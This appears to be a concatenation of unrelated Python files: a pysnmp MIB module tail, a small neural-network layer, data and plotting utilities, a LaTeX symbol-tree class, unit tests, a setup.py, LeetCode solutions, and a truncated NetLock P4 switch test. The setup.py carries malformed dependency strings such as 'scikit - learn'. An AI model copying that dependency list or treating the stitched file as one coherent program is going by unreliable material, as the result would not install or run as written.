"hpnicfRTPFrClassApplyFrClassIndex")) if mibBuilder.loadTexts: hpnicfRTPFrClassApplyEntry.setStatus('current') hpnicfRTPFrClassApplyFrClassIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 15, 8, 32, 3, 1, 2, 1, 1, 1), Integer32()) if mibBuilder.loadTexts: hpnicfRTPFrClassApplyFrClassIndex.setStatus('current') hpnicfRTPFrClassApplyStartPort = MibTableColumn((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 15, 8, 32, 3, 1, 2, 1, 1, 2), Integer32().subtype(subtypeSpec=ValueRangeConstraint(2000, 65535))).setMaxAccess("readcreate") if mibBuilder.loadTexts: hpnicfRTPFrClassApplyStartPort.setStatus('current') hpnicfRTPFrClassApplyEndPort = MibTableColumn((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 15, 8, 32, 3, 1, 2, 1, 1, 3), Integer32().subtype(subtypeSpec=ValueRangeConstraint(2000, 65535))).setMaxAccess("readcreate") if mibBuilder.loadTexts: hpnicfRTPFrClassApplyEndPort.setStatus('current') hpnicfRTPFrClassApplyBandWidth = MibTableColumn((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 15, 8, 32, 3, 1, 2, 1, 1, 4), Integer32().subtype(subtypeSpec=ValueRangeConstraint(8, 1000000))).setMaxAccess("readcreate") if mibBuilder.loadTexts: hpnicfRTPFrClassApplyBandWidth.setStatus('current') hpnicfRTPFrClassApplyCbs = MibTableColumn((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 15, 8, 32, 3, 1, 2, 1, 1, 5), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1500, 2000000))).setMaxAccess("readcreate") if mibBuilder.loadTexts: hpnicfRTPFrClassApplyCbs.setStatus('current') hpnicfRTPFrClassApplyRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 15, 8, 32, 3, 1, 2, 1, 1, 6), RowStatus()).setMaxAccess("readcreate") if mibBuilder.loadTexts: hpnicfRTPFrClassApplyRowStatus.setStatus('current') hpnicfRTPFrPvcQueueRunInfoTable = MibTable((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 15, 8, 32, 3, 1, 2, 2), ) if mibBuilder.loadTexts: hpnicfRTPFrPvcQueueRunInfoTable.setStatus('current') hpnicfRTPFrPvcQueueRunInfoEntry = MibTableRow((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 15, 8, 32, 3, 1, 2, 2, 1), ).setIndexNames((0, "HPN-ICF-FR-QOS-MIB", "hpnicfPvcApplyFrClassIfIndex"), (0, "HPN-ICF-FR-QOS-MIB", "hpnicfPvcApplyFrClassDlciNum")) if mibBuilder.loadTexts: hpnicfRTPFrPvcQueueRunInfoEntry.setStatus('current') hpnicfRTPFrPvcQueueSize = MibTableColumn((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 15, 8, 32, 3, 1, 2, 2, 1, 1), Integer32()).setMaxAccess("readonly") if mibBuilder.loadTexts: hpnicfRTPFrPvcQueueSize.setStatus('current') hpnicfRTPFrPvcQueueMaxSize = MibTableColumn((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 15, 8, 32, 3, 1, 2, 2, 1, 2), Integer32()).setMaxAccess("readonly") if mibBuilder.loadTexts: hpnicfRTPFrPvcQueueMaxSize.setStatus('current') hpnicfRTPFrPvcQueueOutputs = MibTableColumn((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 15, 8, 32, 3, 1, 2, 2, 1, 3), Counter32()).setMaxAccess("readonly") if mibBuilder.loadTexts: hpnicfRTPFrPvcQueueOutputs.setStatus('current') hpnicfRTPFrPvcQueueDiscards = MibTableColumn((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 15, 8, 32, 3, 1, 2, 2, 1, 4), Counter32()).setMaxAccess("readonly") if mibBuilder.loadTexts: hpnicfRTPFrPvcQueueDiscards.setStatus('current') mibBuilder.exportSymbols("HPN-ICF-FR-QOS-MIB", HpnicfCirAllowDirection=HpnicfCirAllowDirection, hpnicfFrClassRowStatus=hpnicfFrClassRowStatus, hpnicfPvcApplyFrClassRowStatus=hpnicfPvcApplyFrClassRowStatus, hpnicfFrPvcBandwidthTable=hpnicfFrPvcBandwidthTable, hpnicfRTPFrPvcQueueOutputs=hpnicfRTPFrPvcQueueOutputs, hpnicfFrClassIndex=hpnicfFrClassIndex, hpnicfPvcApplyFrClassIndex=hpnicfPvcApplyFrClassIndex, PYSNMP_MODULE_ID=hpnicfFrQoSMib, hpnicfIfApplyFrClassEntry=hpnicfIfApplyFrClassEntry, hpnicfRTPFrPvcQueueDiscards=hpnicfRTPFrPvcQueueDiscards, hpnicfIfApplyFrClassIfIndex=hpnicfIfApplyFrClassIfIndex, hpnicfIfApplyFrClassTable=hpnicfIfApplyFrClassTable, hpnicfCirAllowRowStatus=hpnicfCirAllowRowStatus, hpnicfIfApplyFrClassRowStatus=hpnicfIfApplyFrClassRowStatus, hpnicfRTPFrClassApplyBandWidth=hpnicfRTPFrClassApplyBandWidth, hpnicfCirAllowDirection=hpnicfCirAllowDirection, hpnicfFrPvcBandwidthMaxReservedBW=hpnicfFrPvcBandwidthMaxReservedBW, hpnicfPvcApplyFrClassIfIndex=hpnicfPvcApplyFrClassIfIndex, hpnicfRTPFrClassApplyEntry=hpnicfRTPFrClassApplyEntry, hpnicfRTPFrPvcQueueMaxSize=hpnicfRTPFrPvcQueueMaxSize, hpnicfRTPFrClassApplyCbs=hpnicfRTPFrClassApplyCbs, hpnicfPvcApplyFrClassTable=hpnicfPvcApplyFrClassTable, hpnicfRTPFrClassApplyTable=hpnicfRTPFrClassApplyTable, hpnicfRTPFrClassApplyStartPort=hpnicfRTPFrClassApplyStartPort, hpnicfFrClassCfgInfoEntry=hpnicfFrClassCfgInfoEntry, hpnicfFrPvcBandwidthAvailable=hpnicfFrPvcBandwidthAvailable, hpnicfRTPFrPvcQueueSize=hpnicfRTPFrPvcQueueSize, hpnicfRTPFrClassApplyEndPort=hpnicfRTPFrClassApplyEndPort, hpnicfRTPFrClassApplyFrClassIndex=hpnicfRTPFrClassApplyFrClassIndex, hpnicfFrClassCfgInfoTable=hpnicfFrClassCfgInfoTable, hpnicfCirAllowCfgInfoEntry=hpnicfCirAllowCfgInfoEntry, hpnicfIfApplyFrClassIndex=hpnicfIfApplyFrClassIndex, hpnicfCirRowStatus=hpnicfCirRowStatus, hpnicfFrQoSObjects=hpnicfFrQoSObjects, hpnicfRTPFrPvcQueueRunInfoTable=hpnicfRTPFrPvcQueueRunInfoTable, hpnicfCirAllowValue=hpnicfCirAllowValue, hpnicfFrQoSMib=hpnicfFrQoSMib, hpnicfCirCfgInfoEntry=hpnicfCirCfgInfoEntry, hpnicfCirAllowCfgInfoTable=hpnicfCirAllowCfgInfoTable, hpnicfCirFrClassIndex=hpnicfCirFrClassIndex, hpnicfRTPFrPvcQueueRunInfoEntry=hpnicfRTPFrPvcQueueRunInfoEntry, hpnicfFrClassIndexNext=hpnicfFrClassIndexNext, hpnicfFrPvcBandwidthEntry=hpnicfFrPvcBandwidthEntry, hpnicfPvcApplyFrClassEntry=hpnicfPvcApplyFrClassEntry, hpnicfFrClassObjects=hpnicfFrClassObjects, hpnicfCirAllowFrClassIndex=hpnicfCirAllowFrClassIndex, hpnicfRTPQoSObjects=hpnicfRTPQoSObjects, hpnicfRTPFrClassApplyRowStatus=hpnicfRTPFrClassApplyRowStatus, hpnicfCirCfgInfoTable=hpnicfCirCfgInfoTable, hpnicfCirValue=hpnicfCirValue, hpnicfPvcApplyFrClassDlciNum=hpnicfPvcApplyFrClassDlciNum, hpnicfFrClassName=hpnicfFrClassName)
python
#!/usr/bin/env python3 from uuid import UUID, uuid4 def generate_client_token(): return uuid4().hex def is_valid_uuid(uuid_string): try: UUID(uuid_string) except ValueError: return False return True
python
from .gui import * from .ui import *
python
import numpy as np from typing import Type from nn.activations import Activation, Sigmoid class Layer: m, n = None, None class Input(Layer): def __init__(self, n_features, batch_size): self.m = n_features self.n = batch_size self.cache = dict() def forward_step(self, x): self.cache["A"] = x class HiddenLayer(Layer): """ Fully connected layer """ activation: Type[Activation] = None weights = None bias = None gradients = None def __init__(self, prev_layer: Layer, units: int, activation: Type[Activation], seed=1): self.m = units self.n = prev_layer.m self.activation = activation self.prev_layer = prev_layer self.weights = np.random.rand(self.m, self.n) self.bias = np.random.rand(self.m, 1) self.gradients = dict() self.cache = dict() def forward_step(self): def linear_product(a_prev, W, b): """ Parameters ---------- A -- activations from previous layer (or input data): (size of previous layer, number of examples) W -- weights matrix: numpy array of shape (size of current layer, size of previous layer) b -- bias vector, numpy array of shape (size of the current layer, 1) Returns ------- Z -- linear product """ return np.dot(W, a_prev) + b a_prev = self.prev_layer.cache["A"] z = linear_product(a_prev, self.weights, self.bias) a = self.activation.activate(z) self.cache["A"] = a def backward_step(self): dA = self.gradients["dA"] a_prev = self.prev_layer.cache["A"] dZ = self.activation.differentiate(dA, self.cache["A"]) # m = batch size m = a_prev.shape[1] # don't need to store the next layer dA anymore, overwrite dW = 1 / m * np.dot(dZ, a_prev.T) db = 1 / m * np.sum(dZ, axis=1, keepdims=True) dA = np.dot(self.weights.T, dZ) # saving results try: self.prev_layer.gradients["dA"] = dA except AttributeError: # print("reached input layer, backpropagation finished") pass self.gradients = {"dW": dW, "db": db} # class Output(Layer): # def __init__(self, prev_layer: Layer, out_units: int, loss_function): # self.m = prev_layer.n # self.n = out_units # self.loss_function = loss_function # self.prev_layer = prev_layer # # def forward_step(self): # # # def backward_step(self): # pass
python
import numpy as np from matplotlib import pyplot as plt import time from numba import jit def load_delta_U(fname): # Assumes npz npz_arr = np.load(fname) delta_U = npz_arr['arr_0'] print("Successfully Loaded covariate distances from {}".format(fname)) return delta_U def create_delta_U(dmr, U, dU, K, N, fname, normalize=True): # Assumes fname is .npz print("Calculating Pairwise Co-Variate Distances...") t = time.time() delta_U = dmr.make_covariate_distances(U, dU, K, N, normalize) print("Finished. Took {:.3f} seconds.".format(time.time() - t)) if fname is not None: print("Saving Pairwise Co-Variate Distances to {}".format(fname)) np.savez_compressed(fname, delta_U) return delta_U def print_errors(calc_pred_err, estimations, err_name): print("="*20 + " {} Error ".format(err_name) + "="*20) pred_errs = [] for (beta_hat, estimator_name) in estimations: err = calc_pred_err(beta_hat) pred_errs.append((err, estimator_name)) print("{}:{:.2f}".format(estimator_name, err)) return pred_errs @jit(nopython=True) def soft_normalize(x): """Compute softmax values for each sets of scores in x.""" exps = np.exp(x) return exps / np.sum(exps) def float_or_zero(x): try: return float(x) except ValueError: return 0. def to_one_hot(U, should_change): if should_change[0]: one_hot = to_one_hot_one_feature(U[:, 0]) else: one_hot = np.array([float_or_zero(U[i, 0]) for i in range(len(U))]) one_hot = np.expand_dims(one_hot, 1) for j in range(1, U.shape[1]): if should_change[j]: one_hot_feature = to_one_hot_one_feature(U[:, j]) one_hot = np.hstack((one_hot, one_hot_feature)) else: continuous_feature = np.array([float_or_zero(U[i, j]) for i in range(len(U))]) continuous_feature = np.expand_dims(continuous_feature, 1) one_hot = np.hstack((one_hot, continuous_feature)) return one_hot def to_one_hot_one_feature(U): """ Assumes U has a single feature. Returns matrix of size U.shape[0], number_unique + 1 """ as_set = set(U) set_as_list = list(as_set) one_hot = np.zeros((U.shape[0], len(as_set))) for i in range(U.shape[0]): one_hot[i, set_as_list.index(U[i])] = 1 return one_hot def plot_learned_betas(true_beta, estimations, U): fig = plt.figure() # Assumes the first value in each row of U is a category colors = ['blue', 'green', 'cyan', 'orange', 'red'] true_color = 'black' true_marker = '*' markers = ['+', 'o', '.', 'x', 'v'] labels = set(U[:, 0]) for i, label in enumerate(labels): ax = fig.add_subplot(len(labels)/2+1, 2, i+1) ax.set_title("Type={}".format(label)) handles = [] descriptions = [] selection = U[:, 0] == label handle = ax.scatter( true_beta[selection, 0], true_beta[selection, 1], color=true_color, marker='*') handles.append(handle) descriptions.append('True Beta') for j, (estimation, estimator_name) in enumerate(estimations): handle = ax.scatter( estimation[selection, 0], estimation[selection, 1], color=colors[j], marker='+') handles.append(handle) descriptions.append(estimator_name) ax = fig.add_subplot(len(labels)/2+1, 2, i+2) plt.legend(handles, descriptions, loc='upper center', bbox_to_anchor=(0.5, 1.05), ncol=2, fancybox=True, shadow=True) plt.show()
python
import time from datetime import datetime # our libs from src import lcd def renderDisplay(): # Initialise display lcd.lcd_init() now = datetime.now() # dd/mm/YY H:M:S date_time = now.strftime("%d/%m/%Y %H:%M:%S") # Send some more text lcd.lcd_string("Akaal last fed:", lcd.LCD_LINE_1) lcd.lcd_string("", lcd.LCD_LINE_2) lcd.lcd_string(f"{date_time}", lcd.LCD_LINE_3) lcd.lcd_string("nom nom nom", lcd.LCD_LINE_4)
python
from typing import List, Dict, Callable, Optional from utils.types import Box from .utils import RELATIONS, optimize_latex_string class SymbolTreeNode: # these will be placed when a bracket should not be optimized # for example `\frac{w}{a}` should not be converted to `\fracwa`, but `\frac{w}a` is fine # so we try to place these where appropriate, then after all generation, they will be replaced by the correct # bracket type __NO_OPTIMIZE_OPEN_BRACKET = '\u1234' __NO_OPTIMIZE_CLOSE_BRACKET = '\u1235' __LABELS_LEFT_CANNOT_OPTIMIZE = ['\\sum', '\\int', '\\pi'] def __init__(self, label: str, crop: Box, position: int) -> None: self.position: int = position self.label: str = label self.crop: Box = crop self.relations: Dict[str, List['SymbolTreeNode']] = {relation_name: [] for relation_name in RELATIONS} # add inverse relations self.relations.update({f"{relation_name}_inverse": [] for relation_name in RELATIONS}) def connect_with_relation(self, other: 'SymbolTreeNode', relation: str) -> None: assert relation in RELATIONS, f"relation type {relation} is unknown" relations_list = self.relations[relation] already_exist_index = SymbolTreeNode.__find_node_with_condition(relations_list, lambda node: node.position == other.position) assert already_exist_index is None, \ f"connection from {self.position} to {other.position} with relation '{relation}' already exists" relations_list.append(other) other.__connect_with_relation_inverse(self, relation) def __connect_with_relation_inverse(self, other: 'SymbolTreeNode', relation: str) -> None: assert relation in RELATIONS, f"relation type {relation} is unknown" relations_list = self.relations[f"{relation}_inverse"] already_exist_index = SymbolTreeNode.__find_node_with_condition(relations_list, lambda node: node.position == other.position) assert already_exist_index is None, \ f"connection from {self.position} to {other.position} with relation '{relation}_inverse' already exists" relations_list.append(other) def remove_connection_with_relation(self, relation: str, position: int) -> None: assert relation in RELATIONS, f"relation type {relation} is unknown" relations_list = self.relations[relation] index = SymbolTreeNode.__find_node_with_condition(relations_list, lambda node: node.position == position) if index is not None: other = relations_list.pop(index) other.__remove_connection_with_relation_inverse(relation, self.position) else: raise ValueError(f"node with position {position} could not be found in relation {relation}") def __remove_connection_with_relation_inverse(self, relation: str, position: int) -> None: assert relation in RELATIONS, f"relation type {relation} is unknown" relations_list = self.relations[f"{relation}_inverse"] index = SymbolTreeNode.__find_node_with_condition(relations_list, lambda node: node.position == position) if index is not None: relations_list.pop(index) else: raise ValueError(f"node with position {position} could not be found in relation {relation}_inverse") def normalized(self) -> bool: for relation_str in RELATIONS: if len(self.relations[relation_str]) > 1: return False return True def generate_latex(self, optimize: bool = True) -> str: result = self.__generate_latex(optimize=False) # optimize in one go if optimize: result = optimize_latex_string(result) result = result.replace(SymbolTreeNode.__NO_OPTIMIZE_OPEN_BRACKET, '{').replace( SymbolTreeNode.__NO_OPTIMIZE_CLOSE_BRACKET, '}') return result def __generate_latex(self, optimize: bool = False) -> str: result = self.label assert self.normalized(), "some relation/s have more than one node" if self.label == '\\frac': assert self.relations['up'] and self.relations['down'], "\\frac should have `up` and `down` relations" up_node = self.relations['up'][0] down_node = self.relations['down'][0] result += f"{SymbolTreeNode.__NO_OPTIMIZE_OPEN_BRACKET}{up_node.__generate_latex(optimize)}" \ f"{SymbolTreeNode.__NO_OPTIMIZE_CLOSE_BRACKET}{{{down_node.__generate_latex(optimize)}}}" for relation_str in ['power', 'sub']: assert not self.relations[relation_str], f"\\frac cannot have `{relation_str}` relation" elif self.label == '\\sum': if up_node := self.relations['up']: result += f"^{{{up_node[0].__generate_latex(optimize)}}}" if down_node := self.relations['down']: result += f"_{{{down_node[0].__generate_latex(optimize)}}}" elif self.label == '\\int': up_and_power = self.relations['up'] + self.relations['power'] down_and_sub = self.relations['down'] + self.relations['sub'] if up_and_power: assert len(up_and_power) == 1, "Integral cannot have two up connections" result += f"^{{{up_and_power[0].__generate_latex(optimize)}}}" if down_and_sub: assert len(down_and_sub) == 1, "Integral cannot have two down connections" result += f"_{{{down_and_sub[0].__generate_latex(optimize)}}}" else: if nodes := self.relations['sub']: result += f"_{{{nodes[0].__generate_latex(optimize)}}}" if nodes := self.relations['power']: result += f"^{{{nodes[0].__generate_latex(optimize)}}}" for relation_str in ['up', 'down']: assert not self.relations[relation_str], f"`{self.label}` cannot have `{relation_str}` relation" # in this case, we treat `none` as `left` because there is no other way # FIXME: maybe throw exception on `none`? for relation_str in ['left', 'none']: if self.label in SymbolTreeNode.__LABELS_LEFT_CANNOT_OPTIMIZE: prefix = SymbolTreeNode.__NO_OPTIMIZE_OPEN_BRACKET suffix = SymbolTreeNode.__NO_OPTIMIZE_CLOSE_BRACKET else: prefix = "" suffix = "" if nodes := self.relations[relation_str]: result += f'{prefix}{nodes[0].__generate_latex(optimize)}{suffix}' if optimize: return optimize_latex_string(result) return result @staticmethod def __find_node_with_condition(nodes: List['SymbolTreeNode'], condition: Callable[['SymbolTreeNode'], bool]) -> \ Optional[int]: for i, node in enumerate(nodes): if condition(node): return i return None
python
import os import tempfile import unittest from epregressions.builds.base import BaseBuildDirectoryStructure, autodetect_build_dir_type, KnownBuildTypes class TestAutoDetectBuildType(unittest.TestCase): def setUp(self): self.build_dir = tempfile.mkdtemp() def add_cache_file(self, content): cache_file = os.path.join(self.build_dir, 'CMakeCache.txt') with open(cache_file, 'w') as f: f.write(content) def add_subdirectory(self, dir_name): os.makedirs(os.path.join(self.build_dir, dir_name)) def test_empty_dir_is_unknown(self): self.assertEqual(KnownBuildTypes.Unknown, autodetect_build_dir_type(self.build_dir)) def test_detect_install(self): self.add_subdirectory('ExampleFiles') self.assertEqual(KnownBuildTypes.Installation, autodetect_build_dir_type(self.build_dir)) def test_detect_makefile(self): self.add_cache_file('CMAKE_GENERATOR:INTERNAL=Unix Makefiles') self.assertEqual(KnownBuildTypes.Makefile, autodetect_build_dir_type(self.build_dir)) def test_detect_visual_studio(self): self.add_cache_file('CMAKE_GENERATOR:INTERNAL=Visual Studio 2019') self.assertEqual(KnownBuildTypes.VisualStudio, autodetect_build_dir_type(self.build_dir)) def test_detect_ninja(self): self.add_cache_file('CMAKE_GENERATOR:INTERNAL=Ninja') self.assertEqual(KnownBuildTypes.Makefile, autodetect_build_dir_type(self.build_dir)) class TestBaseBuildMethods(unittest.TestCase): def setUp(self): self.base_build = BaseBuildDirectoryStructure() def test_set_build_directory_abstract(self): with self.assertRaises(NotImplementedError): self.base_build.set_build_directory('hello') def test_get_build_tree_abstract(self): with self.assertRaises(NotImplementedError): self.base_build.get_build_tree() def test_get_idf_directory(self): with self.assertRaises(NotImplementedError): self.base_build.get_idf_directory() def test_verify_without_setting_build_dir(self): with self.assertRaises(Exception): self.base_build.verify() def test_get_idfs(self): temp_idf_dir = tempfile.mkdtemp() self.assertSetEqual(set(), self.base_build.get_idfs_in_dir(temp_idf_dir)) with open(os.path.join(temp_idf_dir, 'file1.idf'), 'w') as f: f.write('hi') with open(os.path.join(temp_idf_dir, 'file2.iQQ'), 'w') as f: f.write('he') with open(os.path.join(temp_idf_dir, 'file3.idf'), 'w') as f: f.write('ha') with open(os.path.join(temp_idf_dir, 'file4.imf'), 'w') as f: f.write('ha') # macro with open(os.path.join(temp_idf_dir, '_ExternalInterface-actuator.idf'), 'w') as f: f.write('ha') # ext interface as FMU with open(os.path.join(temp_idf_dir, 'HVAC3ZoneGeometry.imf'), 'w') as f: f.write('ha') # macro resource file # TODO: Modify the test to expect relevant IMF files as well and fix the function self.assertEqual(3, len(self.base_build.get_idfs_in_dir(temp_idf_dir)))
python
from comprehemd.blocks import HeadingBlock def test_repr() -> None: block = HeadingBlock("foo", level=1, source="foo\n") assert repr(block) == 'HeadingBlock("foo", level="1", source="foo\\n")' def test_str() -> None: block = HeadingBlock("foo", level=1, source="foo\n") assert str(block) == "HeadingBlock (1): foo"
python
import setuptools with open("README.md", "r") as fh: long_description = fh.read() setuptools.setup( name="cae", version="0.1", author="Arsenii Astashkin", author_email="[email protected]", description="Hybrid Singular Value Decomposition (SVD) implementation", long_description=long_description, url="https://github.com/arsast/cae", packages=setuptools.find_packages(), classifiers=[ "Programming Language :: Python :: 3", "License :: OSI Approved :: MIT License", "Operating System :: OS Independent", ], license = "MIT", install_requires = [ "joblib == 0.13.2", "numpy == 1.16.3", "scikit - learn == 0.21.1", "scikit - sparse == 0.4.4", "scipy == 1.2.1", "sklearn == 0.0" ] )
python
__________________________________________________________________________________________________ sample 16 ms submission class Solution: def combinationSum3(self, k: int, n: int, d:int = 9) -> List[List[int]]: if k * (2 * d - k + 1) <= 2 * n: return [list(range(d - k + 1, d + 1))] if k * (2 * d - k + 1) == 2 * n else [] if k * (k + 1) >= 2 * n: return [list(range(1, k + 1))] if k * (k + 1) == 2 * n else [] return [l + [d] for l in self.combinationSum3(k - 1, n - d, d - 1)] + self.combinationSum3(k, n, d - 1); __________________________________________________________________________________________________ sample 13000 kb submission class Solution: def combinationSum3(self, k: int, n: int) -> List[List[int]]: nums = list(range(1, 10)) res = [] def dfs(nums, path, k, target, res): if k < 0 or sum(path) > target: return if k == 0 and sum(path) == target: res.append(path) return for i in range(len(nums)): dfs(nums[i+1:], path + [nums[i]], k-1, target, res) dfs(nums, [], k, n, res) return res __________________________________________________________________________________________________
python
import pd_base_tests import pdb import time import sys from collections import OrderedDict from ptf import config from ptf.testutils import * from ptf.thriftutils import * import os from pal_rpc.ttypes import * from netlock.p4_pd_rpc.ttypes import * from mirror_pd_rpc.ttypes import * from res_pd_rpc.ttypes import * from pkt_pd_rpc.ttypes import * from config import * MAX_SLOTS_NUM = 130000 MEM_BIN_PACK = "bin" MEM_RAND_WEIGHT = "r_weight" MEM_RAND_12 = "r_12" MEM_RAND_200 = "r_20" UDP_DSTPORT = 8888 port_ip_dic = {188: 0x0a010001 , 184: 0x0a010002 , 180: 0x0a010003 , 176: 0x0a010004 , 172: 0x0a010005 , 168: 0x0a010006 , 164: 0x0a010007 , 160: 0x0a010008 , 156: 0x0a010009 , 152: 0x0a01000a , 148: 0x0a01000b , 144: 0x0a01000c} tot_num_lks = 0 slots_v_list = [] left_bound_list = [] dev_id = 0 if test_param_get("arch") == "Tofino": print "TYPE Tofino" sys.stdout.flush() MIR_SESS_COUNT = 1024 MAX_SID_NORM = 1015 MAX_SID_COAL = 1023 BASE_SID_NORM = 1 BASE_SID_COAL = 1016 elif test_param_get("arch") == "Tofino2": print "TYPE Tofino2" sys.stdout.flush() MIR_SESS_COUNT = 256 MAX_SID_NORM = 255 MAX_SID_COAL = 255 BASE_SID_NORM = 0 BASE_SID_COAL = 0 else: print "TYPE NONE" print test_param_get("arch") sys.stdout.flush() ports = [188] mirror_ids = [] dev_tgt = DevTarget_t(0, hex_to_i16(0xFFFF)) def setup_random(seed_val=0): if 0 == seed_val: seed_val = int(time.time()) print print "Seed is:", seed_val sys.stdout.flush() random.seed(seed_val) def make_port(pipe, local_port): assert(pipe >= 0 and pipe < 4) assert(local_port >= 0 and local_port < 72) return (pipe << 7) | local_port def port_to_pipe(port): local_port = port & 0x7F assert(local_port < 72) pipe = (port >> 7) & 0x3 assert(port == ((pipe << 7) | local_port)) return pipe def port_to_pipe_local_port(port): return port & 0x7F swports = [] swports_by_pipe = {} for device, port, ifname in config["interfaces"]: if port == 0: continue if port == 64: continue pipe = port_to_pipe(port) print device, port, pipe, ifname print int(test_param_get('num_pipes')) if pipe not in swports_by_pipe: swports_by_pipe[pipe] = [] if pipe in range(int(test_param_get('num_pipes'))): swports.append(port) swports.sort() swports_by_pipe[pipe].append(port) swports_by_pipe[pipe].sort() if swports == []: for pipe in range(int(test_param_get('num_pipes'))): for port in range(1): swports.append( make_port(pipe,port) ) cpu_port = 64 #cpu_port = 192 print "Using ports:", swports sys.stdout.flush() def mirror_session(mir_type, mir_dir, sid, egr_port=0, egr_port_v=False, egr_port_queue=0, packet_color=0, mcast_grp_a=0, mcast_grp_a_v=False, mcast_grp_b=0, mcast_grp_b_v=False, max_pkt_len=1024, level1_mcast_hash=0, level2_mcast_hash=0, mcast_l1_xid=0, mcast_l2_xid=0, mcast_rid=0, cos=0, c2c=0, extract_len=0, timeout=0, int_hdr=[], hdr_len=0): return MirrorSessionInfo_t(mir_type, mir_dir, sid, egr_port, egr_port_v, egr_port_queue, packet_color, mcast_grp_a, mcast_grp_a_v, mcast_grp_b, mcast_grp_b_v, max_pkt_len, level1_mcast_hash, level2_mcast_hash, mcast_l1_xid, mcast_l2_xid, mcast_rid, cos, c2c, extract_len, timeout, int_hdr, hdr_len) class NETLOCK_HDR(Packet): name = "NETLOCK_HDR" fields_desc = [ XByteField("recirc_flag", 0), XByteField("op", 0), XByteField("mode", 0), XIntField("tid", 0), XIntField("lock", 0) ] class ADM_HDR(Packet): name = "ADM_HDR" fields_desc = [ XByteField("op", 0), XIntField("lock", 0), XIntField("new_left", 0), XIntField("new_right", 0) ] def netlock_packet(pktlen=0, eth_dst='00:11:11:11:11:11', eth_src='00:22:22:22:22:22', ip_src='0.0.0.2', ip_dst='0.0.0.1', udp_sport=8000, udp_dport=LK_PORT, recirc_flag=0, op=0, mode=0, tid=0, lock=0): udp_pkt = simple_udp_packet(pktlen=0, eth_dst=eth_dst, eth_src=eth_src, ip_dst=ip_dst, ip_src=ip_src, udp_sport=udp_sport, udp_dport=udp_dport) return udp_pkt / NETLOCK_HDR(recirc_flag=recirc_flag, op=op, mode = mode, tid = tid, lock = lock) def adm_packet(pktlen=0, eth_dst='00:11:11:11:11:11', eth_src='00:22:22:22:22:22', ip_src='0.0.0.2', ip_dst='0.0.0.1', udp_sport=8000, udp_dport=ADM_PORT, op=0, lock=0, new_left=0, new_right=0): udp_pkt = simple_udp_packet(pktlen=0, eth_dst=eth_dst, eth_src=eth_src, ip_dst=ip_dst, ip_src=ip_src, udp_sport=udp_sport, udp_dport=udp_dport) return udp_pkt / ADM_HDR(op=op, lock = lock, new_left = new_left, new_right = new_right) def scapy_netlock_bindings(): bind_layers(UDP, NETLOCK_HDR, dport=LK_PORT) bind_layers(UDP, ADM_HDR, dport=ADM_PORT) def receive_packet(test, port_id, template): dev, port = port_to_tuple(port_id) (rcv_device, rcv_port, rcv_pkt, pkt_time) = dp_poll(test, dev, port, timeout=2) nrcv = template.__class__(rcv_pkt) return nrcv def print_packet(test, port_id, template): receive_packet(test, port_id, template).show2() def addPorts(test): test.pal.pal_port_add_all(dev_id, pal_port_speed_t.BF_SPEED_40G, pal_fec_type_t.BF_FEC_TYP_NONE) test.pal.pal_port_enable_all(dev_id) ports_not_up = True print "Waiting for ports to come up..." sys.stdout.flush() num_tries = 12 i = 0 while ports_not_up: ports_not_up = False for p in swports: x = test.pal.pal_port_oper_status_get(dev_id, p) if x == pal_oper_status_t.BF_PORT_DOWN: ports_not_up = True print " port", p, "is down" sys.stdout.flush() time.sleep(3) break i = i + 1 if i >= num_tries: break assert ports_not_up == False print "All ports up." sys.stdout.flush() return def init_tables(test, sess_hdl, dev_tgt): global tot_num_lks global slots_v_list test.entry_hdls_ipv4 = [] test.entry_hdls_ipv4_2 = [] test.entry_acquire_lock_table = [] test.entry_ethernet_set_mac = [] test.entry_dec_empty_slots_table = [] test.entry_fix_src_port_table = [] test.entry_check_lock_exist_table = [] test.entry_set_tag_table = [] test.entry_change_mode_table = [] test.entry_forward_to_server_table = [] test.entry_get_tenant_inf_table = [] ipv4_table_address_list = [0x0a010001, 0x0a010002, 0x0a010003, 0x0a010004, 0x0a010005, 0x0a010006, 0x0a010007, 0x0a010008, 0x0a010009, 0x0a01000a, 0x0a01000b, 0x0a01000c, 0x01010101] ipv4_table_port_list = [188, 184, 180, 176, 172, 168, 164, 160, 156, 152, 148, 144, 320] tgt_tenant = [1,2,3, 4,5,6, 7,8,9, 10,11,0, 1] ethernet_set_mac_src = ["\xa8\x2b\xb5\xde\x92\x2e", "\xa8\x2b\xb5\xde\x92\x32", "\xa8\x2b\xb5\xde\x92\x36", "\xa8\x2b\xb5\xde\x92\x3a", "\xa8\x2b\xb5\xde\x92\x3e", "\xa8\x2b\xb5\xde\x92\x42", "\xa8\x2b\xb5\xde\x92\x46", "\xa8\x2b\xb5\xde\x92\x4a", "\xa8\x2b\xb5\xde\x92\x4e", "\xa8\x2b\xb5\xde\x92\x52", "\xa8\x2b\xb5\xde\x92\x56", "\xa8\x2b\xb5\xde\x92\x5a"] ethernet_set_mac_dst = ["\x3c\xfd\xfe\xab\xde\xd8", "\x3c\xfd\xfe\xa6\xeb\x10", "\x3c\xfd\xfe\xaa\x5d\x00", "\x3c\xfd\xfe\xaa\x46\x68", "\x3c\xfd\xfe\xab\xde\xf0", "\x3c\xfd\xfe\xab\xdf\x90", "\x3c\xfd\xfe\xab\xe0\x50", "\x3c\xfd\xfe\xab\xd9\xf0", "\xd0\x94\x66\x3b\x12\x37", "\xd0\x94\x66\x84\x9f\x19", "\xd0\x94\x66\x84\x9f\xa9", "\xd0\x94\x66\x84\x54\x81"] # fix_src_port = [9000, 9001, 9002, 9003, 9004, 9005, 9006, 9007] fix_src_port = [] for i in range(256): fix_src_port.append(9000 + i) udp_src_port_list = [] for i in range(128): udp_src_port_list.append(UDP_DSTPORT + i) # add entries for ipv4 routing test.client.ipv4_route_set_default_action__drop(sess_hdl, dev_tgt) for i in 